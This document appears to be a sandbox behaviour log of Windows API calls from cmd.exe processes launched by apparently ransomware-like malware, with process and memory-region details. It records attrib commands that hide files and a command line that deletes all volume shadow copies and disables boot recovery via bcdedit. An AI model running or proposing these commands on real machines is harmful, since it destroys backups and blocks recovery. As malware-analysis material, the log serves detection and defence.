GetLastError () returned 0x2 [0178.098] 
FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0x281488 [0178.098] FindClose (in: hFindFile=0x281488 | out: hFindFile=0x281488) returned 1 [0178.098] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0xffffffff [0178.099] GetLastError () returned 0x2 [0178.099] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0x281488 [0178.099] FindClose (in: hFindFile=0x281488 | out: hFindFile=0x281488) returned 1 [0178.099] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.099] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.099] GetConsoleTitleW (in: lpConsoleTitle=0x14efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.099] InitializeProcThreadAttributeList (in: lpAttributeList=0x14ee74, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14ef3c | out: lpAttributeList=0x14ee74, lpSize=0x14ef3c) returned 1 [0178.099] UpdateProcThreadAttribute (in: lpAttributeList=0x14ee74, dwFlags=0x0, Attribute=0x60001, lpValue=0x14ef34, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14ee74, lpPreviousValue=0x0) returned 1 [0178.099] GetStartupInfoW (in: lpStartupInfo=0x14ee30 | out: lpStartupInfo=0x14ee30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0178.099] 
lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0178.099] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14eed0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14ef1c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" ", lpProcessInformation=0x14ef1c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xbfc, dwThreadId=0xc30)) returned 1 [0178.101] CloseHandle (hObject=0x50) returned 1 [0178.101] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.101] GetEnvironmentStringsW () returned 0x282e28* [0178.101] FreeEnvironmentStringsW (penv=0x282e28) returned 1 [0178.101] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0178.271] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x14ee10 | out: lpExitCode=0x14ee10*=0x0) returned 1 [0178.271] CloseHandle (hObject=0x4c) returned 1 [0178.271] _vsnwprintf (in: _Buffer=0x14ef58, _BufferCount=0x13, _Format="%08X", _ArgList=0x14ee1c | out: _Buffer="00000000") returned 8 [0178.271] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0178.271] GetEnvironmentStringsW () returned 0x282e28* [0178.271] FreeEnvironmentStringsW (penv=0x282e28) returned 1 [0178.271] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0178.271] GetEnvironmentStringsW () 
returned 0x282e28* [0178.271] FreeEnvironmentStringsW (penv=0x282e28) returned 1 [0178.271] DeleteProcThreadAttributeList (in: lpAttributeList=0x14ee74 | out: lpAttributeList=0x14ee74) [0178.271] GetConsoleTitleW (in: lpConsoleTitle=0x14f258, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.271] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.271] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.271] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.272] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0xffffffff [0178.272] GetLastError () returned 0x2 [0178.272] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0xffffffff [0178.272] GetLastError () returned 0x2 [0178.272] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0x281488 [0178.272] FindClose (in: hFindFile=0x281488 | out: hFindFile=0x281488) returned 1 [0178.272] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0xffffffff [0178.272] GetLastError () returned 0x2 [0178.272] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0x281488 [0178.272] FindClose (in: hFindFile=0x281488 | out: hFindFile=0x281488) returned 1 [0178.273] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.273] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.273] GetConsoleTitleW (in: lpConsoleTitle=0x14efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.273] InitializeProcThreadAttributeList (in: lpAttributeList=0x14ee74, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14ef3c | out: lpAttributeList=0x14ee74, lpSize=0x14ef3c) returned 1 [0178.273] UpdateProcThreadAttribute (in: lpAttributeList=0x14ee74, dwFlags=0x0, Attribute=0x60001, lpValue=0x14ef34, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14ee74, lpPreviousValue=0x0) returned 1 [0178.273] GetStartupInfoW (in: lpStartupInfo=0x14ee30 | out: lpStartupInfo=0x14ee30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0178.273] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0178.273] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14eed0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, 
dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14ef1c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"", lpProcessInformation=0x14ef1c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc64, dwThreadId=0xc20)) returned 1 [0178.274] CloseHandle (hObject=0x4c) returned 1 [0178.274] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.274] GetEnvironmentStringsW () returned 0x2838d0* [0178.274] FreeEnvironmentStringsW (penv=0x2838d0) returned 1 [0178.274] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0178.382] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x14ee10 | out: lpExitCode=0x14ee10*=0x0) returned 1 [0178.382] CloseHandle (hObject=0x50) returned 1 [0178.382] _vsnwprintf (in: _Buffer=0x14ef58, _BufferCount=0x13, _Format="%08X", _ArgList=0x14ee1c | out: _Buffer="00000000") returned 8 [0178.382] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0178.382] GetEnvironmentStringsW () returned 0x2838d0* [0178.382] FreeEnvironmentStringsW (penv=0x2838d0) returned 1 [0178.382] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0178.382] GetEnvironmentStringsW () returned 0x2838d0* [0178.382] FreeEnvironmentStringsW (penv=0x2838d0) returned 1 [0178.382] DeleteProcThreadAttributeList (in: lpAttributeList=0x14ee74 | out: lpAttributeList=0x14ee74) [0178.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.382] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.382] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.382] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.382] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.383] 
SetConsoleInputExeNameW () returned 0x1 [0178.383] GetConsoleOutputCP () returned 0x1b5 [0178.383] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.383] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.383] exit (_Code=0) Process: id = "322" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c80" os_pid = "0xb68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "308" os_parent_pid = "0xd0c" cmd_line = "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24652 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24653 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24654 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24655 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 24656 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24657 
start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24658 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24659 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24660 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24661 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24757 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24758 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24759 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24760 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24761 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 24762 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24763 start_va = 
0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24764 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24765 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24766 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24767 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24768 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24769 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24770 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24771 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24772 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = 
"imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24773 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24774 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24775 start_va = 0x3a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 24776 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 24777 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 24778 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 24779 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 24780 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 24781 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 436 os_tid = 0xb04 [0178.191] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfee4 | out: lpSystemTimeAsFileTime=0x1cfee4*(dwLowDateTime=0x9fed80a0, dwHighDateTime=0x1d440a9)) [0178.191] GetCurrentProcessId () returned 0xb68 [0178.191] GetCurrentThreadId () returned 0xb04 [0178.191] GetTickCount () 
returned 0x33957 [0178.191] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfedc | out: lpPerformanceCount=0x1cfedc*=23498015769) returned 1 [0178.192] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0178.192] __set_app_type (_Type=0x1) [0178.192] __p__fmode () returned 0x76b331f4 [0178.192] __p__commode () returned 0x76b331fc [0178.192] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0178.192] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0178.192] GetCurrentThreadId () returned 0xb04 [0178.192] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb04) returned 0x38 [0178.192] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0178.192] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0178.193] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.193] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0178.193] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfe74 | out: phkResult=0x1cfe74*=0x0) returned 0x2 [0178.193] VirtualQuery (in: lpAddress=0x1cfeab, lpBuffer=0x1cfe44, dwLength=0x1c | out: lpBuffer=0x1cfe44*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0178.193] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfe44, dwLength=0x1c | out: lpBuffer=0x1cfe44*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0178.193] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfe44, dwLength=0x1c | out: lpBuffer=0x1cfe44*(BaseAddress=0xd1000, AllocationBase=0xd0000, 
AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0178.193] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfe44, dwLength=0x1c | out: lpBuffer=0x1cfe44*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0178.193] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfe44, dwLength=0x1c | out: lpBuffer=0x1cfe44*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0178.193] GetConsoleOutputCP () returned 0x1b5 [0178.193] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.193] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0178.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.193] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0178.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.193] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.194] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.194] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.194] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.194] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.194] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0178.194] GetEnvironmentStringsW () returned 0x2b01a0* [0178.194] FreeEnvironmentStringsW (penv=0x2b01a0) returned 1 [0178.194] GetEnvironmentStringsW () returned 0x2b01a0* [0178.194] FreeEnvironmentStringsW (penv=0x2b01a0) returned 1 [0178.194] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cede4 | out: phkResult=0x1cede4*=0x40) returned 0x0 [0178.194] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x0, lpData=0x1cedf0*=0xc8, lpcbData=0x1cede8*=0x1000) returned 0x2 [0178.194] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x1, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.194] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x0, lpData=0x1cedf0*=0x1, lpcbData=0x1cede8*=0x1000) returned 0x2 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x0, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x40, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x40, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x0, lpData=0x1cedf0*=0x40, lpcbData=0x1cede8*=0x1000) returned 0x2 [0178.195] RegCloseKey (hKey=0x40) returned 0x0 [0178.195] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cede4 | out: phkResult=0x1cede4*=0x40) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, 
lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x0, lpData=0x1cedf0*=0x40, lpcbData=0x1cede8*=0x1000) returned 0x2 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x1, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x0, lpData=0x1cedf0*=0x1, lpcbData=0x1cede8*=0x1000) returned 0x2 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x0, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x9, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x9, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x0, lpData=0x1cedf0*=0x9, lpcbData=0x1cede8*=0x1000) returned 0x2 [0178.195] RegCloseKey (hKey=0x40) returned 0x0 [0178.195] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638d [0178.195] srand (_Seed=0x5b88638d) [0178.195] GetCommandLineW () returned="cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" [0178.195] GetCommandLineW () returned="cmd.exe /c 
